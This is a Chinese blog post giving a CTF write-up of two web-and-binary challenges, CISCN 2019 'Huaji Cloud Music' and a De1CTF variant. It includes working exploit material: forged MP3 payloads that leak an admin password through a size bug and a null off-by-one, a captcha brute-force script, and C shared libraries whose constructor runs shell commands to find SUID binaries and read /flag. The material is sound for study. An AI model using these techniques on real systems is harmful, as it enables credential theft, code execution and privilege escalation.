2020-09-27

最新推荐文章于 2022-12-30 13:01:56 发布
最新推荐文章于 2022-12-30 13:01:56 发布
阅读量309 收藏
点赞数
分类专栏: 总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/108828642
版权

Web&&Pwn

前些天看到了山科大一位表哥的文章,提及了一些Web与Pwn结合的技术,非常符合我的理念,以此作为引子,开始探讨以下两道Web_Pwn题目。

0x0 2019ciscn web——滑稽云音乐

在这里插入图片描述

  • 这道题目一看页面还是挺美观的,看得出来出题人用心了!翻看过后有用的页面就是注册登录和上传音乐了

注册页面如下:

在这里插入图片描述

  • 如何源码泄露的部分就不说了,因为我是本地搭建的环境,当时比赛是什么流程我并不知道。直接进行代码审计吧。首先看一下注册页面的代码
...

if (isset($username)&&isset($password1)&&isset($password2)&&isset($code)){
    $username=trim((string) $username);
    $password1=(string) $password1;
    $password2=(string) $password2;
    $code=(string) $code;
    if (strlen($username)<4||strlen($password1)<8||strlen($password2)<8||strlen($code)<1||strlen($username)>16||strlen($password1)>32||strlen($code)>32||$username=='admin'){
        set_code();
        ob_end_clean();
        die(json_encode(array('status'=>0,'info'=>'输入格式或长度不符合规定!','code'=>$_SESSION['code'],'calc'=>$_SESSION['calc'])));
    }elseif ($password1!==$password2) {
        set_code();
        ob_end_clean();
        die(json_encode(array('status'=>0,'info'=>'两次密码输入不一致!','code'=>$_SESSION['code'],'calc'=>$_SESSION['calc'])));
    }elseif (substr(md5($code.$_SESSION['code']),0,5)!=$_SESSION['calc']) {
        set_code();
        ob_end_clean();
        die(json_encode(array('status'=>0,'info'=>'验证码错误!','code'=>$_SESSION['code'],'calc'=>$_SESSION['calc'])));
    }else{
        if (reg($_GLOBALS,$username,$password1)===1){
            set_code();
            ob_end_clean();
            die(json_encode(array('status'=>1,'info'=>'注册成功!')));
        }else{
            set_code();
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'用户名已经存在!','code'=>$_SESSION['code'],'calc'=>$_SESSION['calc'])));
        }
    }
}
...
  • 可知用户名长度在416之间,密码长度在832之间,不能以admin进行注册,猜测admin是存在的,那这就是个关键点。验证码得根据提示进行爆破,脚本如下:
def guess(p,v):
    for i in range(0xffffff):
        g=hashlib.md5(str(i)+p).hexdigest()[:5]
        if g==v:
            print str(i)
            break

注册成功后,登入进去,直接来到上传页面:

在这里插入图片描述

  • 对上传页面的代码进行审计:
...

function clean_string($str){
    $str=substr($str,0,1024);
    return str_replace("\x00","",$str);
}

if (isset($_FILES["file_data"])){
    if ($_FILES["file_data"]["error"] > 0||$_FILES["file_data"]["size"] > 1024*1024*1){
        ob_end_clean();
        die(json_encode(array('status'=>0,'info'=>'上传出错,音乐文件最大支持 1MB。')));
    }else{
        $music_filename=__DIR__."/../uploads/music/".md5($_GLOBALS['salt'].$_SESSION['user']).".mp3";
        if (time()-$_SESSION['timestamp']<3){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'操作太快了,请稍后再上传。')));
        }
        $_SESSION['timestamp']=time();
        move_uploaded_file($_FILES["file_data"]["tmp_name"], $music_filename);
        $handle = fopen($music_filename, "rb");
        if ($handle==FALSE){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'上传失败,未知原因。')));
        }
        $flags = fread($handle, 3);//读取临时文件前三个字节
        fclose($handle);
        if ($flags!=="ID3"){
            unlink($music_filename);
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'上传失败,不是有效的 MP3 文件。')));
        }
        try{
            $parser = FFI::cdef("
                struct Frame{
                    int size;
                    char * data;
                };
                struct Frame * parse(char * password, char * classname, char * filename);
            ", __DIR__ ."/../lib/parser.so");
            $result=$parser->parse($_GLOBALS['admin_password'],"title",$music_filename);
            if ($result->size>0x130) $result->size=0x130;
            $mp3_title=(string) FFI::string($result->data,$result->size);
            if (substr($mp3_title,0,2)=="\xFF\xFE"){
                @$mp3_title_conv=iconv("unicode","utf-8",$mp3_title);
                if ($mp3_title_conv!==FALSE) $mp3_title=$mp3_title_conv;
            }
            $mp3_title=base64_encode(clean_string($mp3_title));
            $result=$parser->parse($_GLOBALS['admin_password'],"artist",$music_filename);
            if ($result->size>0x130) $result->size=0x130;
            $mp3_artist=(string) FFI::string($result->data,$result->size);
            if (substr($mp3_artist,0,2)=="\xFF\xFE"){
                @$mp3_artist_conv=iconv("unicode","utf-8",$mp3_artist);
                if ($mp3_artist_conv!==FALSE) $mp3_artist=$mp3_artist_conv;
            }
            $mp3_artist=base64_encode(clean_string($mp3_artist));
            $result=$parser->parse($_GLOBALS['admin_password'],"album",$music_filename);
            if ($result->size>0x130) $result->size=0x130;
            $mp3_album=(string) FFI::string($result->data,$result->size);
            if (substr($mp3_album,0,2)=="\xFF\xFE"){
                @$mp3_album_conv=iconv("unicode","utf-8",$mp3_album);
                if ($mp3_album_conv!==FALSE) $mp3_album=$mp3_album_conv;
            }
            $mp3_album=base64_encode(clean_string($mp3_album));
            $song=array($mp3_title,$mp3_artist,$mp3_album);
            $nsql=new NoSQLite\NoSQLite($_GLOBALS['dbfile']);
            $music=$nsql->getStore('music');
            $res=$music->get($_SESSION['user']);
            if ($res===null||strlen((string)$res)<=0){
                $res=array();
            }else{
                $res=json_decode($res,TRUE);
            }
            array_push($res,$song);
            $res=json_encode($res);
            $music->set($_SESSION['user'],$res);
            ob_end_clean();
            die(json_encode(array('status'=>1,'info'=>'上传成功!','title'=>$mp3_title,'artist'=>$mp3_artist,'album'=>$mp3_album)));
        }catch(Error $e){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'上传失败,不是有效的 MP3 文件。')));
        }
    }
}else{
    if (isset($_SERVER['CONTENT_TYPE'])){
        if (stripos($_SERVER['CONTENT_TYPE'],'form-data')!=FALSE){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'上传出错,音乐文件最大支持 1MB。')));
        }
    }
}
...
  • 其中这个位置很关键
$parser = FFI::cdef("
                struct Frame{
                    int size;
                    char * data;
                };
                struct Frame * parse(char * password, char * classname, char * filename);
            ", __DIR__ ."/../lib/parser.so");
            $result=$parser->parse($_GLOBALS['admin_password'],"title",$music_filename);
            if ($result->size>0x130) $result->size=0x130;
            $mp3_title=(string) FFI::string($result->data,$result->size);
  • 大概能猜到调用了parse.so库中的parse函数对mp3文件进行解析,然后将结果转成长度为0x130string。到这里先不急着去分析so文件,再看看手中的源码文件,看看能不能直接从中获取admin账户的密码。然而从后面的分析来看是不可能了。
//config.php
<?php
ini_set('display_errors','Off');
error_reporting(0);

date_default_timezone_set("Asia/Shanghai");

ini_set('session.gc_maxlifetime',"3600");
ini_set("session.cookie_lifetime","3600");
session_start();

include 'init.php';

$_GLOBALS['dbfile']=init_config('.sqlite');
$_GLOBALS['salt']=write_config(init_config('.salt'));
$_GLOBALS['admin_password']=write_config(init_config('.passwd'));
if (strlen($_GLOBALS['dbfile'])<=0||strlen($_GLOBALS['salt'])<=0||strlen($_GLOBALS['admin_password'])<=0){
    ob_end_clean();
    die('Permission denied!');
}
$_GLOBALS['dbfile']=__DIR__.'/../config/'.$_GLOBALS['dbfile'];
?>

//init.php
function init_config($ext){
    $file=get_filename($ext);
    if ($file==''){
        $file=rand_str(8).$ext;
        file_put_contents(__DIR__.'/../config/'.$file, '');
        if (!file_exists(__DIR__.'/../config/'.$file)){
            $file=='';
        }
    }
    return $file;
}

function write_config($file,$str = '',$length = 16){
    $content=file_get_contents(__DIR__.'/../config/'.$file);
    if ($content==''){
        if ($str=='') $str=rand_str($length);
        file_put_contents(__DIR__.'/../config/'.$file, $str);
    }
    return file_get_contents(__DIR__.'/../config/'.$file);
}
  • 可见admin的密码是动态生成的。另外一个发现就是firmware.php这个文件。
if ($_SESSION['role']!='admin'){
    $padding='Lorem ipsum dolor sit amet, consectetur adipisicing elit.';
    for($i=0;$i<10;$i++) $padding.=$padding;
    die('<div><div class="container" style="margin-top:30px"><h3 style="color:red;margin-bottom:15px;">只有管理员权限才能访问!</h3></div><p style="visibility: hidden">'.$padding.'</p></div>');
}

if (isset($_FILES["file_data"])){
    if ($_FILES["file_data"]["error"] > 0||$_FILES["file_data"]["size"] > 1024*1024*1){
        ob_end_clean();
        die(json_encode(array('status'=>0,'info'=>'上传出错,固件文件最大支持 1MB。')));
    }else{
        mt_srand(time());
        $firmware_filename=md5(mt_rand().$_SESSION['user']);
        $firmware_filename=__DIR__."/../uploads/firmware/".$firmware_filename.".elf";
        if (time()-$_SESSION['timestamp']<3){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'操作太快了,请稍后再上传。')));
        }
        $_SESSION['timestamp']=time();
        move_uploaded_file($_FILES["file_data"]["tmp_name"], $firmware_filename);
        $handle = fopen($firmware_filename, "rb");
        if ($handle==FALSE){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'上传失败,未知原因。')));
        }
        $flags = fread($handle, 4);
        fclose($handle);
        if ($flags!=="\x7fELF"){
            unlink($firmware_filename);
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'上传失败,不是有效的 ELF 文件。')));
        }
        ob_end_clean();
        die(json_encode(array('status'=>1,'info'=>'上传成功!')));
    }
}else{
    if (isset($_SERVER['CONTENT_TYPE'])){
        if (stripos($_SERVER['CONTENT_TYPE'],'form-data')!=FALSE){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'上传出错,音乐文件最大支持 1MB。')));
        }
    }
}

@$path=$_POST['path'];

function clean_string($str){
    $str=str_replace("\\","",$str);
    $str=str_replace("/","",$str);
    $str=str_replace(".","",$str);
    $str=str_replace(";","",$str);
    return substr($str,0,32);
}

if (isset($path)){
    $path=clean_string(trim((string) $path));
    if (strlen($path)<=0||strlen($path)>64){
        ob_end_clean();
        die(json_encode(array('status'=>0,'info'=>'输入格式或长度不符合规定!')));
    }else{
        $firmware_filename=__DIR__."/../uploads/firmware/".$path.".elf";
        if (!file_exists($firmware_filename)){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'固件文件不存在!')));
        }else{
            try{
                $elf = FFI::cdef("
                    extern char * version;
                ", $firmware_filename);
                $version=(string) FFI::string($elf->version);
                ob_end_clean();
                die(json_encode(array('status'=>1,'info'=>'固件版本号:'.$version)));
            }catch(Error $e){
                ob_end_clean();
                die(json_encode(array('status'=>0,'info'=>'加载固件文件时发生错误!')));
            }
        }
    }
}
?>
  • 这里允许上传一个elf文件,并且可以加载读取出version的值,所以最终我们想的是利用这个页面的功能读取flag,但是此页面仅允许admin用户操作,于是问题就是如何泄露admin的密码。还是回归到upload.php中,他调用parse函数时,admin的密码就是其中一个参数。

在这里插入图片描述

  • 按顺序看看这些函数

在这里插入图片描述

  • IDA中可以可以在BSS段确认frame_datapassword上方0x100处的位置,这里需要记住,后面会涉及到。

在这里插入图片描述

  • 程序会先检查tag,然后解析出标题和大小,最后进行数据拷贝。回想刚才要记住的地方,思考如果这里的大小能够被控制,会发生什么情况。再回到upload.php中,看到
if ($result->size>0x130) $result->size=0x130;
$mp3_title=(string) FFI::string($result->data,$result->size);
  • 援引官方解释,FFI:string(src,size),如果size为0,将把以0为结束符的src转为PHP下的str;如果size不为0,则取src的size个长度转为PHPstr。而frame_data加上管理员的密码不会超过0x130个字节的,所以只要中间没有**’\0’**,就能完全泄露出来。
 (unsigned __int8)(((unsigned __int64)frame_size.Size >> 56) + LOBYTE(frame_size.Size))
                      - ((unsigned int)(frame_size.Size >> 31) >> 24)

  • 这条语句相当于是 frame_size.Size%0x100,所以最多只能拷贝0xff个字节。这里提前说明一下,别看init_proc()函数中已经清空了frame_data,实际在运行过程中,别的地方有用到这个指针,导致里边有部分脏数据,所以不用拷贝0xff个字节的数据,也能在后面将管理员密码泄露出来。

  • 接下来只要去分析一下parse_text_frame_content()这个函数,看看怎么去控制v3就可以了。在has_id3v2tag()中可以知道解析的是ID3版本的格式,建议结合MP3 ID3文件结构去分析代码会更容易。

[]: https://blog.csdn.net/u010650845/article/details/53520426 “MP3文件结构详解”

接下来伪造一个MP3文件就好了,脚本如下

mp3_dat=flat(
    'ID3',
    '\x03',
    '\x00',
    '\x00',
    '\x00\x00\x04\x00',#标签头大小
    'TIT2',
    '\x00\x00\x00\x0a',#标签帧大小。
    '\x00\x00',
    'a'*9+'\x00'
    'TPE1',
    '\x00\x00\x00\x0a',#标签帧大小。
    '\x00\x00',
    'b'*9+'\x00',
    'TALB',
    '\x00\x00\x02\xff',#标签帧大小。实际测试中,ff可以改为其他数字。因为上面的分析说过了,会有部分脏数据,所以不用拷贝0xff个数据
    '\x00\x00',
    'c'*0x200+'\x00',
)
  • 上传之后就能够泄露密码了。

在这里插入图片描述

  • 如果伪造的mp3你非常自信是正确的,但是上传之后就是提示失败,请刷新一下页面,这里我也被坑过。
  • 接下来就利用hotload.php页面来加载firmware.php,进行下一步利用。
  • flag文件在根目录下,并且以当前网站目录下的权限是读取不了的,所以考虑提权,首先想到的是SUID的方式进行提权。编写如下代码,并编译为so文件
//gcc -shared -fPIC filneame -o filemname
#include<stdlib.h>
#include<stdio.h>
#include<unistd.h>

char buf[0x200];
char* version=buf;

__attribute((constructor)) void fun(){
    FILE* pf=popen("find / -user root -perm -4000","r");
    if(pf==NULL)return;
    fread(version,1,0x200,pf);
    fclose(pf);
}
  • 解释一下,这里有2个关键点。
    1. __attribute((constructor)):被修饰的函数将会先于**main()**函数运行,也就是在加载的时候会被调用。相反的 **__attribute((destructor))修饰的函数会在main()**函数执行完毕后执行。
    2. popen(“find / -user root -perm -4000”,“r”):执行命令,查找根目录下具有root身份且具有0x800权限的文件
  • 因为firmware文件中只是加载了库文件,并读取导出的version符号的数据,并没有显示调用某个指定的函数,因此需要用**__attribute((constructor))使得so加载的时候调用函数,将数据写入version**中。
  • 上传文件的脚本如下:
os.system('php sb.php')

ck={'PHPSESSID':'6slmhisev24h8t44jtq5ej14bu'}
file_id={"file_id":0}
file_data={'file_data':open('./test','rb')}
url='http://192.168.146.152:32770/hotload.php?page=firmware'
ct=requests.post(url,data=file_id,files=file_data,cookies=ck)

os.system('php sb.php')
print ct.text

<?php
mt_srand(time());
$fn=md5(mt_rand().'admin');
echo $fn."\n";
?>

  • 根据FFI函数可以知道php的版本是7.4.x的,所以本地的php环境要和容器中的保持一致,否则得到的文件名会不一致!

  • 然后加载文件就能看到泄露出来的信息
    在这里插入图片描述

  • 发现有个满足条件,并且可以用来读取文件的命令,于是上传如下so:

#include<stdlib.h>
#include<stdio.h>
#include<unistd.h>

char buf[0x200];
char *version=buf;

__attribute((constructor)) void fun(){
    cFILE* pf=popen("/usr/bin/tac /flag","r");
    if(pf==NULL)return;
    fread(version,1,0x200,pf);
    fclose(pf);
}

在这里插入图片描述

  • 至此成功读取flag

0x1 De1CTF

方法步骤基本一样,不同的是parser.so文件,因此pwn部分的方式也不一样。其他部分就不说了,主要分析这个elf文件。
在这里插入图片描述

  • 这里是通过strlen()函数获取长度的,strlen()获取的到的长度不包括**‘\0’**。

在这里插入图片描述

  • 这次password的位置在frame_data之上,因此不能再像之前一样泄露密码。但是发现passwordbss段的地址最低位是00

在这里插入图片描述

  • frame_datapassword之间差0x70的大小,因此结合strlen()特点,存在null-off-by-one漏洞,可以溢出frame_data,将mframe_data指针最低位改成00,这就指向了password。在后面EFF:string的时候,相当于读取的是password的内容,从而泄露出来。

  • 构造MP3数据:

mp3_dat=flat(
    'ID3',
    '\x03',
    '\x00',
    '\x00',
    '\x00\x00\x04\x00',
    'TIT2',
    '\x00\x00\x00\x0a',
    '\x00\x00',
    'a'*0x9+'\x00'
    'TPE1',
    '\x00\x00\x00\x0a',
    '\x00\x00',
    'b'*0x9+'\x00',
    'TALB',
    '\x00\x00\x03\x00',
    '\x00\x00',
    'c'*0x70+'\x00',
)

在这里插入图片描述

  • 后面的步骤就和ciscn的题目一样了。
飞鸿踏雪(蓝屏选手)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CTFTraining] CISCN 2019 华北赛区 Day1 Web1
ZXW_NUDT的博客
06-05 1834
[CTFTraining] CISCN 2019 华北赛区 Day1 Web1
[CISCN2019 华北赛区 Day1 Web1]Dropbox
yym68686
08-11 360
[CISCN2019 华北赛区 Day1 Web1]Dropbox 注册后进入网站,上传文件后,用Burp Suite拦截请求,修改请求,任意文件可下载: POST /download.php HTTP/1.1 Host: 3a15d220-2508-43a9-a971-ff055bdaf52f.node4.buuoj.cn Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=71e4c77c7af3596b74ed78af4c
[CISCN2019 华北赛区 Day1 Web1]Dropbox (phar反序列化)
qq_45699846的博客
03-11 2504
[CISCN2019 华北赛区 Day1 Web1]Dropbox (phar反序列化)
CISCN2019 总决赛 Day2 Web1】-Easy web
xixihahawuwu的博客
11-28 790
进入环境是一个登录界面检查页面元素没有发现啥,我们把源码下载下来看看先看config文件 是一个数据库文件 数据库名为ciscnfinal 接着看function文件 我们可以看到有关登录界面的还有两个函数方法 看image文件Get传递两个参数 把一些字符替换成空Addslashes()函数会把一些特殊的字符转义,比如单引号转为\’,\转为\其他的看了下,没有什么信息就过掉了 我们看下upload文件要求我们用户名必须为admin 这里我们可以获得用户名admin在user文件中我们可以知道成功登陆后的.
【全网最新2020-09-27】世界各国地区IP库:IP2LOCATION-LITE-DB11-2020-09-27.CSV(290万条记录)
09-27
更新时间截止到【2020-09-27】一个包含全球80000多个省市的ip库,能够根据ip精确定位到每个城市的经纬度,邮编等信息。总记录数290多万,解压后300多兆,非常适合做ip识别精准定位的一个库。特此分享给大家。
Draft 2020-06-09 07:06:27-数据集
03-14
航空公司客户价值分析 air_data.csv
常微分方程PPT-2020.09.13.rar
09-13
这份"常微分方程PPT-2020.09.13.rar"压缩包文件包含了多个不同主题的资料,尽管文件名称列表中没有直接提到常微分方程,但我们可以推断,这些材料可能与常微分方程的教育或学习资源相关,可能是为了教学或复习而准备...
金士顿64U盘群联PS2251-09(PS2251-09(PS2309)U盘恢复工具.7z
02-20
群联PS2251-09(PS2251-09(PS2309)-F/W 08.05.5D [2018-03-01])主控,使用过程中拔出就写保护变只读状态,也无法解除保护,也格式化不了,DiskGenius工具检测U盘图标有个小锁,还有很多坏道。而且各种低格工具都试...
NOIP2006-2018初赛+2019CSP-J CSP-S初赛(2020.09.27).rar
09-27
NOIP2006-2018初赛+2019CSP-J CSP-S初赛(2020.09.27) NOIP2006-2018初赛+2019CSP-J CSP-S初赛(2020.09.27) NOIP2006-2018初赛+2019CSP-J CSP-S初赛(2020.09.27) NOIP2006-2018初赛+2019CSP-J CSP-S初赛(2020....
[CISCN2019 总决赛 Day2 Web1]Easyweb
沐目的博客
12-08 2596
1. 知识点 备份文件泄露 SQL注入利用 php短标签 2.感悟 这到题,我就写到SQL注入的地方,成功绕过了单引号的限制用\0,但是没有往盲注上想。以为是任意文件下载。看完题解,知道了思路应该是bool盲注,语句成功的话,就让id = 1,回显正常,错误的话 id = 0,就什么都没有。 这是我没有想到的,气死我了,应该是可以想到了。 3.实践 3.1 image.php.bak 御剑扫描...
PwnTheBox(web篇)简单题
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-26 2991
PwnTheBox(web篇)简单题 第一页 exec1 hackergame2019-签到题 网页读取器 管理员本地访问 下载下载 快速计算 该网站已经被黑 PwnTheBox 百度网盘分享链接 Get Post 睿智题目 一道很奇怪的题目 奇葩的题目 验证码 XSS 达拉崩吧大冒险 atchap php是世界上最好的语言 exec2 第二页 Twice SQL Injection 猫咪银行 黑曜石浏览器 信息安全
ctf解密摩斯电码遇到的一些小问题。
admin的博客
10-13 1784
题目来自于:XCTF的Misc-新手-stegano 题目文档下载下来之后就是一个pdf,全是拉丁文。 全部复制下来之后谷歌翻译。 Google 翻译,翻译结果如下所示,可以发现在开头有一串很明显的AB字符串。很容易联想到是摩斯电码。 XXXXXXXXXXXXXXXXXXXXXXXX Close - but still not here ! BABA BBB BA BBA ABA AB B AAB ABAA AB B AA BBB BA AAA BBAABB AABA ABA...
Midnight Sun CTF 2020 Quals Writeup
SkYe's Blog
04-06 563
前言 第一次做国外 CTF 与国内有差异的,我感觉最明显的是题目会多个方向混合出题,比如说 web 与 pwn 结合出题。从部分题目和结合前几天看的 king of hill 直播,感觉国外 CTF 对 linux 知识也要有一定要求,不能仅仅只会做题的亚子。 admpanel 考点:代码能力、linux基操 程序为一个面板,自然有登录功能,帐号密码通过 IDA 看代码得出。登录成功后可以执行命令...
BUUCTF WEB [BJDCTF2020]Mark loves cat
Y1da的博客
04-28 692
BUUCTF WEB [BJDCTF2020]Mark loves cat 在源码中没有发现漏洞点,使用dirsearch扫描,发现.gti泄露 使用scrabble ./scrabble http://70f9aaf8-036c-44f0-b1f1-df263f120cfa.node4.buuoj.cn:81/ 得到flag.php和index.php文件 flag.php <?php $flag = file_get_contents('/flag'); index.php &
攻防世界——MISC——stegano
慎铭的博客
01-06 970
题目描述: 菜狗收到了图后很开心,玩起了pdf 提交格式为flag{xxx},解密字符需小写 附件是一个pdf,给了一大堆的英文字母,不明所以,先将其全选复制粘贴到word里,内容如下: NoFlagHere! NoFlagHere! NoFlagHere! XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Close - but still not
01Editor最新破解
qq_41252520的博客
12-30 9897
注册的提示信息还有界面的提示信息很丰富,这为我们定位关键代码提供了充分的线索。此函数条件为真的分支存在多对1情况,导致逆函数不能保证得到正确的原函数输入,而原函数的输入在后面验证的时候还需要用到。因此,这个函数的逆函数没有意义。在满足条件3、6和7,就能确定hb中的所有元素,然后反求得serial。注意:这个函数是多对一的,所以这个函数的反函数就成了一对多。以上就是所有注册算法流程,接下来考虑如何获得正确的任意用户名的序列号。因为有处条件永不满足。,用来和序列号某个部分进行对比的,所以该函数也不用求逆。
WinDbg设置调试符号路径与调试符号下载(一篇就够)
qq_41252520的博客
02-23 8648
解决WinDbg设置符号路径,无法下载调试符号的问题
结果是这样的,没有根据id排:start_date end_date 0 2020-01-15 2020-04-27 1 2020-09-30 2020-10-10 2 2021-02-07 2021-02-22 3 2021-03-06 2021-03-24 4 2020-01-21 2020-03-03 .. ... ... 639 2021-03-09 2021-03-18 640 2021-03-24 2021-04-01 641 2020-01-12 2020-04-19 642 2021-02-09 2021-02-18 643 2020-01-18 2020-03-09
最新发布
06-03
如果你想根据企业id对结果进行排序,可以在输出结果之前加上一行代码: ```python result = result.sort_values(by=['id']) ``` 此代码将会根据id对结果进行排序,使得每个企业的结果排在一起。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值